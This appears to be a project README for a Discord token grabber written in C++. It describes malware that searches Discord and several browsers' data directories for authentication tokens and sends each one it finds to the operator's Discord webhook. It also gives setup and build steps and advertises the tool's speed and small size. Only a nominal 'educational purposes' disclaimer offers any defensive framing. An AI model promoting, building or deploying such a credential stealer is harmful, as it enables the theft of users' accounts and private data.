A discord token grabber written in C++.
DISCLAIMER: This program should be used for educational purposes only.
C++ 17 is used (filesystem is used in this project). It searches for tokens in Discord, Discord PTB, Discord Canary, Chrome, Opera, Brave and Yandex directories. Once it finds a token, it sends it to your Discord webhook.
- Faster and better performance than a Python token grabber (compiled to .exe.)
- Smaller file size
- Make sure you have Visual Studio 2019 with C++ installed.
- Open the .sln project and then open the .cpp file.
- Paste your webhook link
- Build x86 release